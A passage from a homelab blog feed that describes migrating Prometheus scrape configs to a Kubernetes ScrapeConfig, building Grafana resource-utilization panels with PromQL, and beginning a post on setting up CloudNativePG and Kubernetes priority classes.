hedging their bets a bit claiming that &ldquo;most&rdquo; configs are supported, but in my relatively large scrape configs I didn&rsquo;t find
a single case of an option which wasn&rsquo;t supported in ScrapeConfig.</p>
<p>One somewhat interesting case I would like to bring up was the scrape config
for Uptime Kuma. This had the special requirement of basic auth credentials for
the scrape.
My config looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScrapeConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scraping-kuma</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>: <span style="color:#ae81ff">scrape-kuma</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">staticConfigs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">job</span>: <span style="color:#ae81ff">uptime</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;kuma.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTPS</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">basicAuth</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kuma-basic-auth</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">username</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kuma-basic-auth</span>
</span></span></code></pre></div><p>Here is where I found a difference between the Prometheus config file and the
ScrapeConfig. In my previous <code>prometheus.yaml</code>, I had the following:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">job_name</span>: <span style="color:#e6db74">&#39;uptime&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scrape_interval</span>: <span style="color:#ae81ff">30s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">https</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">static_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">targets</span>: [<span style="color:#e6db74">&#39;kuma.example.com&#39;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">basic_auth</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">password</span>: {{ <span style="color:#ae81ff">with secret &#34;mysecret/foo/kuma&#34; }}{{ .Data.secret }}{{end}}</span>
</span></span></code></pre></div><p>This file would be templated in Nomad with the <code>mysecret/foo/kuma</code> secret
from Vault. Note that I&rsquo;m not giving a <code>username</code> here. Kuma simply ignores
the username in the BasicAuth.
But in the Secret I prepared for the k8s Prometheus, <code>kuma-basic-auth</code>, I had
to add a <code>data.username</code> field, as this field is required, and the admission
webhook of the Prometheus operator would throw an error if it is not supplied.
So now I&rsquo;ve got the username <code>foo</code> in the Secret to work around this issue.</p>
<p>Besides the Uptime Kuma config issue, the migration went very nice and smoothly.
Biggest issue was when I was done copying the old Prometheus data and then
accidentally deleted the volume I had just copied that data to, instead of the
old volume. &#x1f926;</p>
<h2 id="the-k8s-dashboard">The k8s dashboard</h2>
<p>Now onto the result of all this data gathering. &#x1f913;</p>
<p>The first thing I would like to ask, if you&rsquo;re also using Prometheus data
scraping for your Kubernetes cluster: How do you identify &ldquo;problematic&rdquo; Pods?
E.g. Pods which are in a CrashLoop, or which are just pending because there&rsquo;s
no space left? I didn&rsquo;t really find anything good, and my googling skills
deserted me. If you&rsquo;ve got a couple good stats, hit me up on the Fediverse,
please!</p>
<p>Okay, first two plots are overall resource utilization in the cluster:</p>
<figure>
    <img loading="lazy" src="utilization.png"
         alt="A screenshot of two Grafana panels. Both show three gauges each, which are labeled &#39;Control Plane&#39;, &#39;Ceph&#39; and &#39;Workers&#39;. The first panel shows CPU resource usage, where the Control Plane has 48%, Ceph 92% and Workers 19%. The other panel show Memory resource usage, with the control plane at 37%, Ceph at 73% and Workers at 24%."/> <figcaption>
            <p>My resource utilization panels.</p>
        </figcaption>
</figure>

<p>This shows the three groups of hosts in my cluster, which are separated by different
taints. The control plane are the three control plane nodes, 4 cores and 4 GB
of RAM each, simulating the three Raspberry Pi 4 4GB which will ultimately house
the control plane. Ceph is currently two machines hosting the OSDs for the storage
and some other Ceph pieces. They&rsquo;re so full because Ceph needs a lot of pods
for basic functionality, and I gave them all an affinity for the Ceph hosts.
The workers are currently two VMs and a lone Raspberry Pi CM4 8GB. As you can
see from the utilization, most of what&rsquo;s running on the k8s cluster at the moment
is still infrastructure.</p>
<p>These two panels were not as easy to create as I had thought. I just couldn&rsquo;t
get the values to line up with the results of <a href="https://github.com/robscott/kube-capacity">kube-capacity</a>.</p>
<p>But before I get too far into the weeds, let&rsquo;s have a look at the PromQL query
for the CPU utilization panel. The memory panel is almost exactly the same:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#f92672">(</span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>kube_pod_container_resource_requests{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span> <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{value<span style="color:#f92672">!=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">)))</span> <span style="color:#f92672">/</span> <span style="color:#66d9ef">sum</span><span style="color:#f92672">((</span>kube_node_status_capacity{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span>kube_node_spec_taint{value<span style="color:#f92672">!=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">))</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">(</span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>kube_pod_container_resource_requests{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span> <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{value<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">)))</span> <span style="color:#f92672">/</span> <span style="color:#66d9ef">sum</span><span style="color:#f92672">((</span>kube_node_status_capacity{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span>kube_node_spec_taint{value<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">))</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">(</span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>kube_pod_container_resource_requests{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span> <span style="color:#f92672">unless</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{}<span style="color:#f92672">)))</span> <span style="color:#f92672">/</span> <span style="color:#66d9ef">sum</span><span style="color:#f92672">((</span>kube_node_status_capacity{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">unless</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> kube_node_spec_taint{}<span style="color:#f92672">))</span>
</span></span></code></pre></div><p>(One of those things which just make me quietly happy: Hugo&rsquo;s syntax highlighter
supports PromQL. &#x1f642;)</p>
<p>Each of these has a numerator, which is the sum of the requests of all of the
pods running on the given group of hosts. The denominator then is the total
resources available to the given host group. This had some complexity.</p>
<p>Let&rsquo;s just start with the very first part, which is similar for all of the
host groups:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>kube_pod_container_resource_requests{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span>
</span></span></code></pre></div><p>This part contains the base metric, <code>kube_pod_container_resource_requests</code>.
This metric reflects the resources requested by each container in each pod.
The first thing I found was that these were of course not just all currently
running pods, but really all pods. So the first thing to do was a &ldquo;filter&rdquo; on
the containers. This is what the second part does:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span>
</span></span></code></pre></div><p>Let&rsquo;s start with this one at the back: The <code>kube_pod_status_phase</code> is a really
useful metric when you want to find things out about pods. In this case, I
wanted to get all <code>Running</code> pods. But it&rsquo;s not enough to just get all the
Pods with <code>Running</code> phase. That would be too many, including pods which are
already gone, for some reason. But checking whether the actual value of the
metric equals <code>1</code> does the trick.</p>
<p>So what now happens: With the <code>and</code> as an operator, Prometheus outputs a new
vector which contains all the labels of <code>kube_pod_container_resource_requests</code>.
Then it filters out all values from that vector where no entry in the
<code>kube_pod_status_phase{phase=&quot;Running&quot;} == 1</code> vector has the same value for the
<code>pod</code> label. In short, the result of this entire first part are the resource
requests for all containers on the entire cluster which are currently running.</p>
<p>But this wasn&rsquo;t exactly what I wanted. I need to know whether any of my groups
of hosts is getting full. Which leads me to the second part of the numerator.
This provides the filter for a specific group of hosts. The first two filter
for the two groups of hosts which have a taint, the control plane and Ceph nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{value<span style="color:#f92672">!=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{value<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>The third one filters for my worker nodes, which don&rsquo;t have a taint:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#f92672">unless</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{}<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>Here I&rsquo;m constructing a vector of all nodes with taints and then filter the
Kubernetes pod requests for all elements which are <em>not</em> in that vector.</p>
<p>And with that, I&rsquo;ve finally got three sets of resource requests, one for each
group of hosts.</p>
<p>The denominator then has to be the total resources of the three node groups.
This works the same as the nominator query. Here, the data I want is in the
<code>kube_node_status_capacity{resource=&quot;cpu&quot;}</code> metric, and I again filter by
the taint to get the total resources per group.</p>
<p>Before moving on to the next chart, it&rsquo;s important to note that the <code>kube_pod_container_resource_requests</code>
metric is not 100% accurate. For most of my nodes, summing up all of the
requests results in a slightly too low value, when compared to the output of
kube-capacity. This happens because requests can be put on the container and on
the Pod. One example in my cluster are the Cilium Pods. Going by my Prometheus
metrics, they don&rsquo;t have any CPU requests. But in reality, they do request
50m CPUs, just on the Pod, not the container.
There is a better metric for this, discussed in <a href="https://github.com/kubernetes/kube-state-metrics/issues/1095">this GitHub issue</a>.
This metric, <code>kube_pod_resource_requests</code>, is more precise. But it is not enabled
by default. See also the <a href="https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#kube-scheduler-metrics">Kubernetes docs</a>.
I will likely enable this one later, but did not bother now.</p>
<p>So now onto the next set of metrics, which are the per-container metrics. The
first one is the CPU usage:</p>
<figure>
    <img loading="lazy" src="cpu.png"
         alt="A screenshot of a Grafana time series panel. It shows 24h worth of CPU utilization. It is titled &#39;CPU usage by Container&#39;. There are a number of curves between 0 and 0.2 on the Y axis, with relatively little fluctuation overall."/> <figcaption>
            <p>My CPU utilization, in total CPU usage seconds.</p>
        </figcaption>
</figure>

<p>I&rsquo;ve got two of these, both using the <code>container_cpu_usage_seconds_total</code> metric.
One of them is aggregated per container, and one per Namespace. I did not go
with aggregation by Pod, because the pod names are not stable.
The query for this plot is pretty simple:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>container_cpu_usage_seconds_total{container<span style="color:#f92672">!~</span>&#34;<span style="color:#e6db74">POD|</span>&#34;}[<span style="color:#960050;background-color:#1e0010">$__rate_interval</span>]<span style="color:#f92672">))</span> <span style="color:#66d9ef">by</span> <span style="color:#f92672">(</span>container<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>The only &ldquo;special&rdquo; thing I needed to do here was to exclude the <code>POD</code> &ldquo;container&rdquo;
and the container with the empty name. The value with the <code>POD</code> container is
actually the &ldquo;Pause&rdquo; container of the Pod, while the empty container is the value
for the cgroup, and I&rsquo;m interested in neither.</p>
<p>This plot shows one of those small, yet interesting things which make me look
at my metrics:</p>
<p><figure>
    <img loading="lazy" src="prom_cpu.png"
         alt="A screenshot of a Grafana time series panel. It shows the CPU usage of the Prometheus container from 15:40 to 17:40. In the interval from the start to 16:30, the CPU usage hovers at around 0.0125. Then there is a short break in the graph, and it continues around 16:32, but with a higher baseline, hovering around 0.0906 instead after a short period of usage up to 0.25."/> <figcaption>
            <p>CPU usage of Prometheus after a redeployment.</p>
        </figcaption>
</figure>

This plot shows the CPU utilization of the Prometheus Pod during a re-schedule,
which happens around 16:30. Prometheus wasn&rsquo;t actually using more CPU because it
was doing more - it just got moved from my x86 server to a Pi. And on that Pi,
Prometheus needs to spend more CPU time to do the same thing.
Simple and logical, of course, but I love seeing simple principles spelled out
and measured like this. &#x1f642;</p>
<p>Let&rsquo;s finish by looking at the values for the CPU usage again. It reflects the
current state of the cluster pretty well - there&rsquo;s not that much running on it
yet. The majority of my workloads are still running on my Nomad/Baremetal Ceph
cluster. The three top users by container are the cilium-agent, kube-apiserver
and etcd. Even the Ceph OSDs come only after that. This will change in the future
of course, e.g. the OSDs will become more loaded once the root disks of my worker
nodes start running off of the Ceph Rook cluster. But for now, it&rsquo;s mostly
just the infrastructure.</p>
<figure>
    <img loading="lazy" src="memory.png"
         alt="Another Grafana screenshot, this time of a panel for the Memory consumption, by namespace. It shows a 24h interval. There are two distinct curves at 5.5 GB and 8.3 GB. The 5.5 GB curve only slightly throughout the day, while the 8.3 GB curve shows a max of 8.5 GB and a minimum of 7.9 GB."/> <figcaption>
            <p>Memory usage by Namespace.</p>
        </figcaption>
</figure>

<p>The memory usage shows a similar pattern, although here, the top curve, around
8.3 GB, is the <code>rook-cluster</code> namespace, housing all the main Ceph components.
The next lower curve, around 5.5 GB is the <code>kube-system</code> namespace, again showing
that for now, infrastructure dominates my cluster&rsquo;s memory consumption.</p>
<p>Memory usage, overall, is not an easy thing to measure in Linux. I&rsquo;ve found
<a href="https://itnext.io/from-rss-to-wss-navigating-the-depths-of-kubernetes-memory-metrics-4d7d77d8fdcb">this article</a> quite useful. cAdvisor, which provides the per-container metrics, has several
choices for memory usage:</p>
<ul>
<li><code>container_memory_rss</code></li>
<li><code>container_memory_usage_bytes</code></li>
<li><code>container_memory_working_set_bytes</code></li>
</ul>
<p>Here are these three metrics, shown as a sum for my Monitoring namespace, running
Prometheus itself and the Prometheus operator as well as kube-state-metrics:</p>
<figure>
    <img loading="lazy" src="three_mem_types.png"
         alt="Another Grafana screenshot, this time of a single panel with three curves, showing different memory metrics. All three curves follow roughly the same behavior. Initially, all three show a slow increase, until they shortly raise up, then go down, just to then raise up even higher, before going down again, all in unison and by approximately the same value. The lowest of the three, titled &#39;container_memory_rss&#39;, starts at around 570 MB. The middle curve, showing &#39;container_memory_working_set_bytes&#39;, starts at about 600 MB, while the highest of the three, &#39;container_memory_usage_bytes&#39;, starts at 680 MB."/> <figcaption>
            <p>The three types of memory metrics as sums over the monitoring Namespace.</p>
        </figcaption>
</figure>

<p>This shows the differences. The <a href="https://en.wikipedia.org/wiki/Resident_set_size">Resident Set Size</a>
being heap and stack in memory is the lowest of the three curves. Next, the
Working Set Size is the amount of memory which was recently touched by the
process. It is generally called the data which the process needs in the next couple
of seconds to do its work. I found <a href="https://www.brendangregg.com/blog/2018-01-17/measure-working-set-size.html">this post</a> and interesting read. The final and highest curve is the Memory Usage.
This is so high because it also contains files mapped into memory, even when those
files haven&rsquo;t been touched in a while. No surprise that Prometheus, which is
mostly a time series DB, all said and done, should have a pretty hefty memory
mapping usage for its DB files.
What annoyed me a bit is that none of these values actually corresponds to the
<code>RES</code> values I&rsquo;m seeing in htop. But the working set came closest, and its
definition made the most sense to me, so I&rsquo;ve been going with that one for now.</p>
<p>Next up is networking:
<figure>
    <img loading="lazy" src="networking_tx.png"
         alt="Another Grafana panel, this time for the network transmission, again by Namespace. All of the curves are below the 200 Mbps threshold for the majority of the time. But there are two significant spikes. The first one at 02:30 going up to 1.85 Gbps, and the second one at 03:30, going up to 2.48 Gbps."/> <figcaption>
            <p>Network transmissions by namespace over 24h. The spikes are dominated by the rook-cluster namespace, in orange.</p>
        </figcaption>
</figure>
</p>
<p>First important thing to note about this chart: It is an aggregation over all Pods
in a namespace. And those pods might be running on different hosts. That&rsquo;s how
I&rsquo;m getting max throughput of 2.48 Gbps, even though I&rsquo;ve only got a 1 Gbps
LAN here. Another thing might be loopback interface traffic, which of course can
also be faster. The two spikes at 02:30 and 03:30 are my backups. The first, lower
spike up to 1.85 Gbps are my volume updates. The Ceph Rook cluster already
hosts the S3 backup buckets, while the baremetal cluster still hosts the CSI
volumes. So I expect these spikes to increase in the future, when the Ceph Rook
cluster needs to provide both, the data being backed up and the backup target.
Then the higher spike at 03:30 is my backup of many of those backup buckets to
an external HDD. I&rsquo;m currently not 100% sure why that one produces more network
traffic.
What I&rsquo;m also wondering about right now is what that blue curve, which follows
the two spikes but doesn&rsquo;t go quite as high, is all about. That&rsquo;s the rook-ceph
namespace, which only contains the Rook operator and the CSI plugin pods. None
of those should be in the data path during a transmission. Not sure what&rsquo;s going
on here.</p>
<p>Then let me finish with my favorite plot:
<figure>
    <img loading="lazy" src="csi_volumes.png"
         alt="A Grafana plot showing four gauges. They are titled &#39;prometheus-monitoring-kube-prometheus-&#39; and then the label is cut off. The rest are titled &#39;scratch-volume&#39;, twice, and finally &#39;scratch-redis-0&#39;. The three scratch volumes show very &lt; 1% usage, while the prometheus gauge shows 56%."/> <figcaption>
            <p>CSI storage volume utilization.</p>
        </figcaption>
</figure>

This plot shows the space utilization of all currently mounted CSI volumes. Which
is absolutely great, because for Nomad, I had to create my own scripting, which
basically ran <code>df -h</code> on the nodes and filtered for Nomad&rsquo;s CSI volume mount
dir to find the right values. Those were then written to a file in Prometheus
format, to be picked up by the local node-exporter&rsquo;s <code>textfile</code> collector. But
here, I&rsquo;m getting those directly from Kubernetes, which is pretty nice.
But there&rsquo;s one disadvantage with this plot: If a volume has been remounted
during the metric interval, it will show up twice, as one of the labels on the
<code>kubelet_volume_stats</code> is the node where the volume was mounted.</p>
<p>And that&rsquo;s it! &#x1f389;
I&rsquo;ve finally got metrics for my k8s cluster. Next step will be migrating my
Grafana instance to k8s as well.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 8: Setting up CloudNativePG for Postgres DB Support</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/</link>
      <pubDate>Thu, 29 Feb 2024 00:13:05 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/</guid>
      <description>Setting up CloudNativePG with a full Keycloak example</description>
      <content:encoded><![CDATA[<p>Wherein I set up cloud-native-pg to supply Postgres clusters in my k8s cluster.</p>
<p>This is part nine of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p><a href="https://www.postgresql.org/">PostgreSQL</a> is currently the only DBMS in my
Homelab. My initial plan was to just copy and paste the deployment over from
my Nomad setup. But then I was pointed towards <a href="https://cloudnative-pg.io/">CloudNativePG</a>,
which is an operator for managing Postgres deployments in Kubernetes.</p>
<p>But before I go into details on CloudNativePG, a short overview of my current setup in
Nomad. I&rsquo;ve got only a single Postgres instance, hosting several databases for
a variety of apps. By far the largest DB at the moment is for my Mastodon
instance, with something over 1 GB in size. It runs on a CSI volume provided
by my Ceph cluster, located on a couple of SSDs. All apps use this one Postgres
instance, and there&rsquo;s no High Availability or failover.</p>
<p>For backups, I&rsquo;m doing a full <code>pg_dumpall</code> of all the databases, which I pipe
into Restic and back up to an S3 bucket. For new apps, I&rsquo;m following a simple
playbook of manually creating the database and the DB user from the command line
with <code>psql</code>.</p>
<p>This approach is okayish, but CloudNativePG has one big advantage: It allows
declarative creation of Postgres instances. So I won&rsquo;t have to follow a playbook
anymore.</p>
<h1 id="overview-of-cloudnativepg">Overview of CloudNativePG</h1>
<figure>
    <img loading="lazy" src="cnpg-archi.png"
         alt="An architecture diagram for CloudNativePG. The central part is the cnpg-operator. Three pieces, each titled &#39;kind: Cluster&#39; and with &#39;dbname: foo/bar/baz&#39; point into the operator. The operator itself then points to three pairs of databases. Each of them called &#39;foo/bar/baz&#39; and having a partner called &#39;foo-replica/bar-replica/baz-replica&#39;. Into each of those pairs point three apps, called &#39;foo-app/bar-app/baz-app&#39;."/> <figcaption>
            <p>Architecture of CloudNativePG.</p>
        </figcaption>
</figure>

<p>The CloudNativePG architecture is centered around the operator. This operator
is responsible for creating the database clusters themselves. And these are
full Postgres clusters. CloudNativePG only has minimal direct support for multiple
databases in a single cluster.</p>
<p>When the operator sees a new <a href="https://cloudnative-pg.io/documentation/current/cloudnative-pg.v1/#postgresql-cnpg-io-v1-Cluster">Cluster</a>
resource, it creates the given number of Postgres Pods. This can range from a
single pod, without any High Availability, to a cluster with a single primary
and a number of replicas. The replication is entirely build upon Postgres&rsquo; own
replication features. CloudNativePG only provides the correct configuration,
but doesn&rsquo;t put anything on top of it.</p>
<p>Each new cluster is created with a single database and two users, the
<code>postgres</code> superuser and an application user which only has permissions for the
application database.</p>
<p>When a new cluster is created, the operator also provides a Kubernetes Secret,
with the username and password of the application DB user, the name of the
Service for that particular cluster as well as a full JDBC string. Applications
wanting to use the cluster only need to consume the appropriate keys from the
Secret.</p>
<p>In addition to providing the database cluster itself, CloudNativePG also provides
a pretty nice backup system as well as easy use of backups created from that
data to create fresh clusters when recovery from an incident is necessary.</p>
<p>Those backups can be based on writing to an S3 bucket, or creating volume snapshots
from within Kubernetes. In this post, I will concentrate on the S3 method, as
that&rsquo;s what I decided on. No specific reason, besides the fact that I&rsquo;ve got
my other backups in S3 as well, and I already have infrastructure to back those
buckets up on separate media.</p>
<p>In the S3 backups, the Write Ahead Logs are constantly streamed to S3. At the
same time, regular backups of the full <code>PGDATA</code> directory are created and
also pushed to the bucket.</p>
<p>But all of this also comes with some downsides, at least from my PoV. The first and
foremost one is that CloudNativePG only fully supports one database per Postgres
cluster. This is contrary to my current setup with one cluster and many databases.
On a certain level, the setup with one database cluster per database/app doesn&rsquo;t
make much sense to me. Postgres is made to support a number of different databases
per cluster, not just one. But this &ldquo;one DB per cluster&rdquo; has grown out of the
Microservice architecture paradigm. And it does have its advantages. E.g. when
different apps support different Postgres versions.</p>
<p>But it also comes with some overhead. With a single cluster, I can just throw
some HW at it and check occasionally whether I need to add some more. Be this
CPU, memory or storage. But with multiple clusters, I need to make that decision
for each app. And I need to do it up front, where I don&rsquo;t have any data to base
those decisions on. And there&rsquo;s a pretty wide gap just in the apps I&rsquo;m already
running. Both Nextcloud and Mastodon put quite some demands on the databases, with
the Mastodon DB at over 1 GB in size even for my single-user instance. At the
same time, those two apps also put consistent load on the DBs, even when I don&rsquo;t
directly use them. On the other side are things like Keycloak, where the DB comes
in at 12 MB, where access only happens when I actually log in somewhere.
Making all of these decisions, and making them up front, isn&rsquo;t that nice compared
to just having a single DB instance where I just throw some HW at it occasionally.
Now, I have to do that for eight different instances.</p>
<p>Next is the backups. Streaming the WAL to S3 will mean at least some more strain
on my S3 infrastructure. And those WALs are not optional. When using an S3 bucket
for backups, the WALs are mandatory. But it doesn&rsquo;t feel like they bring me
any benefit. I mean sure, when I actually have an issue and need to restore,
it&rsquo;s going to be nice to be able to do Point in Time restores, instead of having
to put in the potentially up to 24h old last backup.
There&rsquo;s also an issue with retention. It&rsquo;s one-dimensional. I can provide one
time window, say 30 days, for which I can restore, but there&rsquo;s no concept of
saying &ldquo;I want a backup for the last 14 days, each one of the last 6 months, and
one year ago&rdquo;.</p>
<p>But with all of this whining, I&rsquo;m still a sucker for declarative definitions of
my database, so let&rsquo;s quit the complaining and get to some YAML files. &#x1f913;</p>
<h1 id="detour-looking-at-k8s-priority-classes">Detour: Looking at K8s priority classes</h1>
<p>Ah, but before we get to the YAML, I would like to take a rather short detour
to Kubernetes&rsquo; <a href="https://kubernetes.io/docs/concepts/scheduling-eviction/pod-priority-preemption/#priorityclass">PriorityClass</a>.
These priority classes are basically complex wrappers around a number between
<code>-2147483648</code> and <code>1000000000</code>. They are priorities used for scheduling by
Kubernetes. If there&rsquo;s no space left on the cluster, and there&rsquo;s a Pod with a
higher priority than an already running one, the running Pod will be removed
and the higher priority one will be deployed.</p>
<p>Kubernetes comes with two of those classes by default, <code>system-cluster-critical</code> and
<code>system-node-critical</code>. As an example, most of my Ceph Rook pods have one or
the other of those. My MON Pods, for example, have the node critical class, as
it is not just important that they run somewhere, but it is important that they
run on certain nodes. The same is true for example for my Fluentbit log shippers,
they also should be running on all nodes before absolutely anything else.
For cluster level critical, my example would again be Ceph Rook Pods, namely
the CSI providers. They don&rsquo;t have to run on specific nodes, but they definitely
have to be running somewhere.</p>
<p>But in my Homelab, there are some additional things which should have priority.
The first thing is just critical apps. This would be things like my databases,
